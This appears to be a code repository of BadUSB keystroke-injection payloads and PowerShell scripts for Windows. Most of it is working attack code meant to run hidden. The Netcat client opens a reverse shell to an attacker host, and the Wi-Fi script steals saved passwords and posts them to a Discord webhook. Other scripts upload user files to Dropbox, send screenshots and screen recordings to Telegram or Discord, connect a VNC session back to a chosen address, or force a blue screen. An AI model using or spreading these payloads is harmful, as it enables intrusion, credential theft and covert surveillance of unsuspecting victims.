/Pranks/Change-System-Sounds.txt: -------------------------------------------------------------------------------- 1 | REM Title: System Events Sound Changer 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Download any sound and set system event sounds to that file. 4 | REM Target: Windows 10,11 5 | 6 | REM Change WAV_FILE_URL_HERE to a hosted .wav file online OR define a local file below (all default sounds are in C:/Windows/Media) 7 | REM you can restore default sounds in control panel 8 | 9 | DEFAULT_DELAY 100 10 | 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -NonI -Ep Bypass 14 | ENTER 15 | DELAY 5000 16 | STRING $sound = "C:Windows\Tasks\sound.wav";$URL = iwr -Uri "WAV_FILE_URL_HERE" -OutFile $sound;$eventNames = @("WindowsUAC", "DeviceDisconnect", "DeviceConnect", "Notification.Default", "Maximize", "Minimize", "Open", "Close", "MenuPopup", "SystemNotification") ;foreach ($eventName in $eventNames) {$KeyPath = "HKCU:\AppEvents\Schemes\Apps\.Default\$eventName\.Current";New-Item -Path $KeyPath -Force | Out-Null;Set-ItemProperty -Path $KeyPath -Name "(Default)" -Value $sound -Force};exit 17 | DELAY 500 18 | ENTER 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /Pranks/USB-SoundSwap.txt: -------------------------------------------------------------------------------- 1 | REM Title: USB device sound swapper 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Swaps the USB Device connect and disconnect sounds. 4 | REM Target: Windows 10,11 5 | 6 | REM you can restore default sounds by running script again. 7 | 8 | DEFAULT_DELAY 100 9 | 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -Ep Bypass 13 | ENTER 14 | DELAY 5000 15 | STRING $Connect = "C:\Windows\media\Windows Hardware Insert.wav";$Disconnect = "C:\Windows\media\Windows Hardware Remove.wav";$Path1 = "HKCU:\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current";$Path2 = "HKCU:\AppEvents\Schemes\Apps\.Default\DeviceConnect\.Current";$Which = Get-ItemProperty -Path $Path1 -Name "(Default)";if ($Which.'(default)' -eq $Connect){Set-ItemProperty -Path $Path1 -Name "(Default)" -Value $Disconnect -Force;Set-ItemProperty -Path $Path2 -Name "(Default)" -Value $Connect -Force}else{Set-ItemProperty -Path $Path1 -Name "(Default)" -Value $Connect -Force;Set-ItemProperty -Path $Path2 -Name "(Default)" -Value $Disconnect -Force};exit 16 | DELAY 500 17 | ENTER 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /Screen-to-Telegram/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | $seconds = 30 # Screenshot interval 3 | $a = 1 # Sceenshot amount 4 | 5 | $Token = "$tg" 6 | $URL='https://api.telegram.org/bot{0}' -f $Token 7 | while($chatID.length -eq 0){ 8 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 9 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 10 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 11 | Sleep 10 12 | } 13 | 14 | While ($a -gt 0){ 15 | 16 | Add-Type -AssemblyName System.Windows.Forms 17 | $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen 18 | $bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height 19 | $graphics = [System.Drawing.Graphics]::FromImage($bitmap) 20 | $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $screen.Size) 21 | $filePath = "$env:temp\sc.png" 22 | $bitmap.Save($filePath, [System.Drawing.Imaging.ImageFormat]::Png) 23 | $graphics.Dispose() 24 | $bitmap.Dispose() 25 | 26 | curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument" | Out-Null 27 | Remove-Item -Path $filePath 28 | 29 | Start-Sleep $seconds 30 | $a-- 31 | } 32 | -------------------------------------------------------------------------------- /Pranks/Invoke Fake Update (.vbs).txt: -------------------------------------------------------------------------------- 1 | REM Title: Invoke Fake Windows Update 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to create a .vbs script to open Chrome and fullscreen. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 200 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | REM create the .vbs script to start chrome and go fullscreen. 19 | STRING cmd 20 | ENTER 21 | STRING cd $env:temp 22 | ENTER 23 | STRING copy con update.vbs 24 | ENTER 25 | STRING Set WshShell = WScript.CreateObject("WScript.Shell") 26 | ENTER 27 | STRING WshShell.Run "chrome.exe -new--window -kiosk https://fakeupdate.net/win8", 1, False 28 | ENTER 29 | STRING WshShell.Run "C:\Windows\System32\scrnsave.scr /s" 30 | ENTER 31 | STRING WScript.Sleep 200 32 | ENTER 33 | STRING WshShell.SendKeys "{F11}" 34 | ENTER 35 | CTRL z 36 | ENTER 37 | STRING start update.vbs 38 | ENTER 39 | DELAY 1000 40 | STRING exit 41 | ENTER 42 | DELAY 1000 43 | 44 | 45 | -------------------------------------------------------------------------------- /Pranks/Dsktop Shortcut Spammer.txt: -------------------------------------------------------------------------------- 1 | REM Title: Dsktop Shortcut Spammer 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to generate a specified amount of shortcuts on the desktop. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | REM *replace 200 with the number of shortcuts you want to create.* 19 | STRING $n = 200;$i = 0;while($i -lt $n){;$num = Get-Random;$Location = "C:\Windows\System32\rundll32.exe" 20 | 21 | REM rest of the script. 22 | STRING ;$WshShell = New-Object -ComObject WScript.Shell;$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk") 23 | STRING ;$Shortcut.TargetPath = $Location;$Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll";$Shortcut.IconLocation = "hotplug.dll,0" 24 | STRING ;$Shortcut.Description ="Device Removal";$Shortcut.WorkingDirectory ="C:\Windows\System32";$Shortcut.Save();Start-Sleep -Milliseconds 10;$i++};sleep 10;exit 25 | -------------------------------------------------------------------------------- /Pranks/Rickroll with Max Volume spam.txt: -------------------------------------------------------------------------------- 1 | REM Title: Rickroll with Max Volume spam 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to create a .vbs script to keep volume maximised and opens youtube for rickroll. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | REM create the .vbs script to keep the volume maxed. 19 | STRING cmd 20 | ENTER 21 | STRING copy con volup.vbs 22 | ENTER 23 | STRING do 24 | ENTER 25 | STRING Set WshShell = CreateObject("WScript.Shell") 26 | ENTER 27 | STRING WshShell.SendKeys(chr(&hAF)) 28 | ENTER 29 | STRING WScript.Sleep 10 30 | ENTER 31 | STRING loop 32 | ENTER 33 | CTRL z 34 | ENTER 35 | STRING start volup.vbs 36 | ENTER 37 | DELAY 1000 38 | STRING exit 39 | ENTER 40 | DELAY 1000 41 | 42 | REM start Microsoft Edge and open YouTube with Rick Astley - Never Gonna Give You Up. 43 | GUI r 44 | DELAY 1000 45 | STRING msedge.exe --new-window -kiosk https://www.youtube.com/watch?v=dQw4w9WgXcQ 46 | ENTER 47 | DELAY 2000 48 | STRING f 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /Exfiltrate-to-Dropbox/main.ps1: -------------------------------------------------------------------------------- 1 | $accessToken = "$db" 2 | $localFolderPath = "$env:USERPROFILE" 3 | 4 | $computerName = "$env:COMPUTERNAME" 5 | $computerNameAsString = $computerName.ToString() 6 | $dropboxCreateFolderUrl = "https://api.dropboxapi.com/2/files/create_folder_v2" 7 | 8 | $dropboxFolderPath = $computerName.ToString() 9 | $dropboxUploadUrl = "https://content.dropboxapi.com/2/files/upload" 10 | 11 | $headers = @{ 12 | "Authorization" = "Bearer $accessToken" 13 | "Content-Type" = "application/octet-stream" 14 | } 15 | $body = @{ 16 | "path" = "/$computerName" 17 | "autorename" = $true 18 | } | ConvertTo-Json 19 | 20 | $files = Get-ChildItem -Path $localFolderPath -Include "*.docx","*.txt","*.pdf","*.jpg","*.png" -Recurse 21 | 22 | foreach ($file in $files) { 23 | $relativePath = $file.FullName.Replace($localFolderPath, '').TrimStart('\') 24 | $dropboxFilePath = "$dropboxFolderPath/$relativePath".Replace('\', '/') 25 | $headers["Dropbox-API-Arg"] = "{`"path`": `"/$dropboxFilePath`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}" 26 | try { 27 | $fileBytes = [System.IO.File]::ReadAllBytes($file.FullName) 28 | $response = Invoke-RestMethod -Uri $dropboxUploadUrl -Method Post -Headers $headers -Body $fileBytes 29 | } 30 | catch {} 31 | } 32 | -------------------------------------------------------------------------------- /Pranks/Change Wallpaper.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Change Wallpaper 3 | REM Author: @beigeworm | https://github.com/beigeworm 4 | REM Description: Uses Powershell to retrieve an image from a specified URL and sets it as the wallpaper. 5 | REM Target: Windows 10,11 6 | 7 | REM **Change INSERT_IMAGE_URL_HERE to a direct link for an image.** 8 | 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell (remove -W Hidden to show the window) 12 | GUI r 13 | DELAY 750 14 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 15 | CTRL-SHIFT ENTER 16 | DELAY 1500 17 | ALT y 18 | DELAY 5000 19 | 20 | 21 | REM powershell one-liner for changing the wallpaper 22 | STRING $url = "INSERT_IMAGE_URL_HERE";$outputPath = "$env:temp\img.jpg";$wallpaperStyle = 2;IWR -Uri $url -OutFile $outputPath 23 | STRING ;$signature = 'using System;using System.Runtime.InteropServices;public class Wallpaper {[DllImport("user32.dll", CharSet = CharSet.Auto)]public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);}' 24 | STRING ;Add-Type -TypeDefinition $signature;$SPI_SETDESKWALLPAPER = 0x0014;$SPIF_UPDATEINIFILE = 0x01;$SPIF_SENDCHANGE = 0x02;[Wallpaper]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $outputPath, $SPIF_UPDATEINIFILE -bor $SPIF_SENDCHANGE) 25 | STRING ;sleep 1;exit 26 | 27 | DELAY 500 28 | ENTER 29 | -------------------------------------------------------------------------------- /Pranks/Blank Image to Discord Spammer.txt: -------------------------------------------------------------------------------- 1 | REM Title: Blank Image to Discord Spammer 2 | REM Author: @beigeworm 3 | REM Description: Uses Powershell to send a blank image to a Discord webhook multiple times (to clear chat). 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | 19 | REM Replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 20 | REM Replace 25 with the number of images to send. 21 | 22 | STRING $i = 0;$url = 'DISCORD_WEBHOOK_HERE';$n = 25 23 | 24 | 25 | REM rest of the script. 26 | STRING ;$b64 = 'iVBORw0KGgoAAAANSUhEUgAAAAQAAAUeCAYAAABZhJAkAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAACISURBVHhe7c1LDoAgDAVAjqRoIt7/ 27 | STRING YMjPwNaVm1k0pdPXEPYj5bUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4Bld5zApxbN7eE3FJ7GfKW92W3hItGvtQezm5yzCrfdtORh+JCktiLQDAr5DyA9jL3oe8Lgu3AAAAAElFTkSuQmCC' 28 | STRING ;$decoded = [System.Convert]::FromBase64String($b64);$File = "$env:temp\bl.png";Set-Content -Path $File -Value $decoded -Encoding Byte;while($i -lt $n){curl.exe -F "file1=@$file" $url;$i++};Remove-Item -Path $file;exit -------------------------------------------------------------------------------- /OSINT/Record-Screen-to-Discord.txt.txt: -------------------------------------------------------------------------------- 1 | REM Title: Record Screen To Discord 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: record a 30 second mkv file of the screen and send to discord. 4 | REM Target: Windows 10 5 | 6 | REM SETUP 7 | REM replace YOUR_WEBHOOK_HERE (below) with your discord webhook. 8 | 9 | REM some setup for dukie script. 10 | DEFAULT_DELAY 100 11 | 12 | GUI r 13 | DELAY 750 14 | 15 | REM open powershell (add "-W Hidden" to hide the window). 16 | STRING powershell -NoP -NonI -Exec Bypass 17 | ENTER 18 | DELAY 5000 19 | 20 | STRING $hookurl = 'YOUR_WEBHOOK_HERE';Function RecordScreen{param ([int[]]$t);$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":arrows_counterclockwise: ``Recording screen for $t seconds..`` :arrows_counterclockwise:"} | ConvertTo-Json ;Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys;$Path = "$env:Temp\ffmpeg.exe";If (!(Test-Path $Path)){$url = "https://cdn.discordapp.com/attachments/803285521908236328/1089995848223555764/ffmpeg.exe";iwr -Uri $url -OutFile $Path};sleep 1;$mkvPath = "$env:Temp\ScreenClip.mkv";if ($t.Length -eq 0){$t = 10};.$env:Temp\ffmpeg.exe -f gdigrab -t 10 -framerate 30 -i desktop $mkvPath;curl.exe -F file1=@"$mkvPath" $hookurl | Out-Null;sleep 1;rm -Path $mp3Path -Force}RecordScreen -t 30;exit 21 | ENTER -------------------------------------------------------------------------------- /Uvnc-Remote-Desktop/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | <# ======================== Start Uvnc client (Remote Desktop) ========================== 3 | 4 | DOWNLOAD SERVER FILES - https://github.com/beigeworm/assets/raw/main/uvnc-server.zip 5 | 6 | SYNOPSIS 7 | Downloads Uvnc client to machine and runs winvnc.exe 8 | Veiwable from another machine with vncviewer.exe 9 | 10 | USAGE 11 | 4. On host machine unzip 'uvnc-server.zip' 12 | 5. In extracted folder right click then click 'open in terminal' 13 | 1. Run this command with your port specified on your host machine - ./vncviewer.exe -listen 8080 14 | 2. Add your IP and PORT below 15 | 3. Run this script on a target machine 16 | 17 | #> 18 | 19 | $ip = "$ip" 20 | $port = '8080' 21 | 22 | $tempFolder = "$env:temp\vnc" 23 | $vncDownload = "https://github.com/beigew0rm/assets/raw/main/winvnc.zip" 24 | $vncZip = "$tempFolder\winvnc.zip" 25 | 26 | if (!(Test-Path -Path $tempFolder)) { 27 | New-Item -ItemType Directory -Path $tempFolder | Out-Null 28 | } 29 | 30 | if (!(Test-Path -Path $vncZip)) { 31 | Invoke-WebRequest -Uri $vncDownload -OutFile $vncZip 32 | } 33 | sleep 1 34 | Expand-Archive -Path $vncZip -DestinationPath $tempFolder -Force 35 | sleep 1 36 | rm -Path $vncZip -Force 37 | 38 | $proc = "$tempFolder\winvnc.exe" 39 | Start-Process $proc -ArgumentList ("-run") 40 | sleep 2 41 | Start-Process $proc -ArgumentList ("-connect $ip::$port") 42 | -------------------------------------------------------------------------------- /Reverse Shells and C2/Simple NetCat Client.txt: -------------------------------------------------------------------------------- 1 | REM Title: Simple NetCat Client 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to start a Netcat client that stays open until the system is restarted. 4 | REM Target: Windows 10 5 | 6 | REM *REQUIREMENTS* 7 | REM start a netcat listener on server machine using port 4444 (example command for netcat > nc.exe -lvp 4444). 8 | 9 | REM *SETUP* 10 | NETCAT FOR WINDOWS - https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip 11 | REM replace YOUR_IP_OR_DOMAIN_HERE with ncat server address and PORT_NUMBER. 12 | 13 | REM some setup for dukie script. 14 | DEFAULT_DELAY 100 15 | 16 | REM open powershell (remove -W Hidden to show the window). 17 | GUI r 18 | DELAY 750 19 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 20 | CTRL-SHIFT ENTER 21 | DELAY 1500 22 | ALT y 23 | DELAY 5000 24 | 25 | REM write out the main Powershell code. 26 | STRING do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("YOUR_IP_OR_DOMAIN_HERE",PORT_NUMBER) 27 | STRING ;$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d) 28 | STRING ;$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5) 29 | ENTER 30 | -------------------------------------------------------------------------------- /Wifi-Networks-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | # shortened URL Detection 3 | if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url} 4 | 5 | $outfile="" 6 | $a=0 7 | $ws=(netsh wlan show profiles) -replace ".*:\s+" 8 | foreach($s in $ws){ 9 | if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ 10 | $ssid=$s.Trim() 11 | if($s -Match ":"){ 12 | $ssid=$s.Split(":")[1].Trim() 13 | } 14 | $pw=(netsh wlan show profiles name=$ssid key=clear) 15 | $pass="None" 16 | foreach($p in $pw){ 17 | if($p -Match "Key Content"){ 18 | $pass=$p.Split(":")[1].Trim() 19 | $outfile+="SSID: $ssid : Password: $pass`n" 20 | } 21 | } 22 | } 23 | $a++ 24 | } 25 | 26 | $outfile | Out-File -FilePath "$env:temp\info.txt" -Encoding ASCII -Append 27 | 28 | $Pathsys = "$env:temp\info.txt" 29 | $msgsys = Get-Content -Path $Pathsys -Raw 30 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 31 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 32 | Start-Sleep 1 33 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 34 | Remove-Item -Path $Pathsys -force 35 | -------------------------------------------------------------------------------- /Pranks/Mario-BSOD.txt: -------------------------------------------------------------------------------- 1 | REM Title: Invoke BSOD 2 | REM Author: @beigeworm 3 | REM Description: This will open powershell and cause a blue screen. 4 | REM Target: Windows 10 / 11 5 | REM CREDIT: All credit to FalsePhilosipher for the code! https://github.com/FalsePhilosopher 6 | 7 | 8 | REM some setup for dukie script. 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell 12 | GUI r 13 | DELAY 750 14 | STRING powershell -NoP -NonI -Exec Bypass 15 | ENTER 16 | DELAY 4000 17 | STRING $video = "$env:TMP/mario.wmv";iwr "https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Misc/Win/BSOD/mario-head/mario.wmv" -OutFile $video; & $video;sleep 1;$wshell = New-Object -ComObject wscript.shell;$wshell.SendKeys("{F11}");sleep 5;$source = 'using System; using System.Runtime.InteropServices; public static class CS{[DllImport("ntdll.dll")] public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);[DllImport("ntdll.dll")] public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response); public static unsafe void Kill(){Boolean tmp1;uint tmp2;RtlAdjustPrivilege(19, true, false, out tmp1);NtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out tmp2);}}';$comparams = new-object -typename system.CodeDom.Compiler.CompilerParameters;$comparams.CompilerOptions = '/unsafe';$a = Add-Type -TypeDefinition $source -Language CSharp -PassThru -CompilerParameters $comparams;[CS]::Kill() 18 | ENTER 19 | -------------------------------------------------------------------------------- /Discord-Media-Hog/readme.md: -------------------------------------------------------------------------------- 1 | **SYNOPSIS** 2 | 3 | Uses a Discord bot to send system information, stream desktop and webcam screenshots 4 | Also opens a powershell command line interface through discord. 5 | 6 | ![scampwn](https://github.com/beigeworm/BadUSB-Files-For-FlipperZero/assets/93350544/ffcc08a2-42d6-4ccd-8b3c-9534bea74174) 7 | 8 | **SETUP** 9 | 10 | -SETUP THE BOT 11 | 1. make a discord bot at https://discord.com/developers/applications/ 12 | 2. Enable all Privileged Gateway Intents on 'Bot' page 13 | 3. On OAuth2 page, tick 'Bot' in Scopes section 14 | 4. In Bot Permissions section tick Manage Channels, Read Messages/View Channels, Attach Files, Read Message History. 15 | 5. Copy the URL into a browser and add the bot to your server. 16 | 6. On 'Bot' page click 'Reset Token' and copy the token. 17 | 18 | -SETUP THE SCRIPT 19 | 20 | ----- Option 1 ----- (token placed in ps1 file) 21 | 1. Copy the token into the Bad USB txt file directly 22 | 23 | ----- Option 2 ----- (token hosted online) 24 | 1. Create a file on Pastebin or Github with the content below - Supply your token and optional webhooks (include braces) 25 | { 26 | "tk": "TOKEN_HERE", 27 | "scrwh": "WEBHOOK_HERE", 28 | "camwh": "WEBHOOK_HERE", 29 | "micwh": "WEBHOOK_HERE" 30 | } 31 | 2. Copy the RAW file url into the Bad USB txt file like this.. $uri = 'https://pastebin.com/raw/xxxxxxxx' 32 | 33 | 34 | **INFORMATION** 35 | 36 | - The Discord bot you use must be in one server only 37 | - You can specify webhooks to send duplicate files to other channels on another server (OPTIONAL) 38 | 39 | -------------------------------------------------------------------------------- /GIF-Player/main.ps1: -------------------------------------------------------------------------------- 1 | Add-Type -AssemblyName System.Windows.Forms 2 | Add-Type -AssemblyName System.Drawing 3 | [System.Windows.Forms.Application]::EnableVisualStyles() 4 | 5 | $url = "https://media3.giphy.com/media/tJqyalvo9ahykfykAj/giphy.gif?ep=v1_gifs_search" # example GIF (replace with your own link) 6 | $gifPath = "$env:temp/g.gif" 7 | iwr -Uri $url -OutFile $gifPath 8 | $ErrorActionPreference = 'Stop' 9 | 10 | function Play-Gif { 11 | param( 12 | [string]$GifPath 13 | ) 14 | 15 | $form = New-Object System.Windows.Forms.Form 16 | $pictureBox = New-Object System.Windows.Forms.PictureBox 17 | $timer = New-Object System.Windows.Forms.Timer 18 | 19 | $form.Text = "GIF Player" 20 | $form.Size = New-Object System.Drawing.Size(490, 300) 21 | $form.StartPosition = 'CenterScreen' 22 | $form.Topmost = $true 23 | 24 | $pictureBox.Size = $form.Size 25 | $pictureBox.Image = [System.Drawing.Image]::FromFile($GifPath) 26 | 27 | $timer.Interval = 50 # Adjust the interval as needed for desired animation speed 28 | $timer.Add_Tick({ 29 | $pictureBox.Image.SelectActiveFrame([System.Drawing.Imaging.FrameDimension]::Time, $timer.Tag) 30 | $pictureBox.Refresh() 31 | $timer.Tag = ($timer.Tag + 1) % $pictureBox.Image.GetFrameCount([System.Drawing.Imaging.FrameDimension]::Time) 32 | }) 33 | 34 | $timer.Tag = 0 35 | 36 | $form.Controls.Add($pictureBox) 37 | 38 | $form.Add_Shown({ $timer.Start() }) 39 | 40 | $form.ShowDialog() 41 | } 42 | 43 | Play-Gif -GifPath $gifPath 44 | sleep 1 45 | Remove-Item $gifPath 46 | -------------------------------------------------------------------------------- /File-Monitor-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | # shortened URL Detection 3 | if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url} 4 | 5 | $watcher = New-Object System.IO.FileSystemWatcher -Property @{ 6 | Path = $env:USERPROFILE + '\' 7 | } 8 | $watcher.NotifyFilter = [System.IO.NotifyFilters]::FileName -bor ` 9 | [System.IO.NotifyFilters]::LastWrite -bor ` 10 | [System.IO.NotifyFilters]::DirectoryName 11 | 12 | $action = { 13 | $event = $EventArgs 14 | $path = $event.FullPath 15 | $changeType = $event.ChangeType 16 | $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" 17 | 18 | $msgsys = "[$timestamp] File $changeType > $path" 19 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 20 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 21 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 22 | 23 | } 24 | 25 | Register-ObjectEvent -InputObject $watcher -EventName Created -Action $action 26 | Register-ObjectEvent -InputObject $watcher -EventName Deleted -Action $action 27 | Register-ObjectEvent -InputObject $watcher -EventName Changed -Action $action 28 | 29 | $watcher.EnableRaisingEvents = $true 30 | 31 | while ($true) { 32 | Start-Sleep -Milliseconds 500 33 | } 34 | 35 | Unregister-Event -InputObject $watcher -EventName Created -Action $action 36 | Unregister-Event -InputObject $watcher -EventName Deleted -Action $action 37 | Unregister-Event -InputObject $watcher -EventName Changed -Action $action 38 | -------------------------------------------------------------------------------- /OSINT/Installed Programs and Eventlogs to File.txt: -------------------------------------------------------------------------------- 1 | REM Title: Programs and Eventlogs to File 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to gather a list of installed programs and Windows Eventlogs and saves the info to a file. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | REM the main powershell script. 19 | STRING $date = Get-Date -Format "yyyy-MM-dd-hh-mm-ss";$outputPath = "$env:temp\Osint-$date.txt";New-Item -ItemType File -Path $outputPath 20 | STRING ;$installed = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version, Vendor;$hotfixes = Get-WmiObject -Class Win32_QuickFixEngineering | Select-Object -Property HotFixID, Description, InstalledOn 21 | STRING ;$removed = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object -Property DisplayName, DisplayVersion, Publisher, InstallDate | Where-Object {$_.DisplayName -ne $null} 22 | STRING ;$installed | Format-Table -AutoSize | Out-File -FilePath $outputPath ;$hotfixes | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append 23 | STRING ;$removed | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append;$userActivity = Get-EventLog -LogName Security -EntryType SuccessAudit | Where-Object {$_.EventID -eq 4624 -or $_.EventID -eq 4634} 24 | STRING ;$userActivity | Out-File -FilePath $outputPath -Append;$hardwareInfo = Get-EventLog -LogName System | Where-Object {$_.EventID -eq 12 -or $_.EventID -eq 13};$hardwareInfo | Out-File -FilePath $outputPath -Append 25 | STRING ;sleep 30;exit 26 | ENTER 27 | -------------------------------------------------------------------------------- /Voice-Activated-DarkMode/main.ps1: -------------------------------------------------------------------------------- 1 | <# ===================== VOICE ACTIVATED DARK/LIGHT MODE ====================== 2 | 3 | SYNOPSIS 4 | Control Windows theme with your voice. 5 | Say 'Light' OR 'Dark' to change theme. 6 | 7 | #> 8 | 9 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 10 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 11 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 12 | if($hwnd -ne [System.IntPtr]::Zero){ 13 | $Type::ShowWindowAsync($hwnd, 0) 14 | } 15 | else{ 16 | $Host.UI.RawUI.WindowTitle = 'hideme' 17 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 18 | $hwnd = $Proc.MainWindowHandle 19 | $Type::ShowWindowAsync($hwnd, 0) 20 | } 21 | 22 | while ($true) { 23 | Add-Type -AssemblyName System.Speech 24 | $speech = New-Object System.Speech.Recognition.SpeechRecognitionEngine 25 | $grammar = New-Object System.Speech.Recognition.DictationGrammar 26 | $speech.LoadGrammar($grammar) 27 | $speech.SetInputToDefaultAudioDevice() 28 | $result = $speech.Recognize() 29 | $Theme = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize" 30 | if ($result) { 31 | $text = $result.Text 32 | Write-Output $text 33 | 34 | if ($text -match 'Dark'){ 35 | Write-Host "Set Dark Theme" 36 | Set-ItemProperty $Theme AppsUseLightTheme -Value 0 37 | Set-ItemProperty $Theme SystemUsesLightTheme -Value 0 38 | } 39 | if ($text -match 'Light'){ 40 | Set-ItemProperty $Theme AppsUseLightTheme -Value 1 41 | Set-ItemProperty $Theme SystemUsesLightTheme -Value 1 42 | Write-Host "Set Light Theme" 43 | } 44 | } 45 | } -------------------------------------------------------------------------------- /OSINT/Exfiltrate files to DropBox.txt: -------------------------------------------------------------------------------- 1 | REM Title: Exfiltrate Files To DropBox 2 | 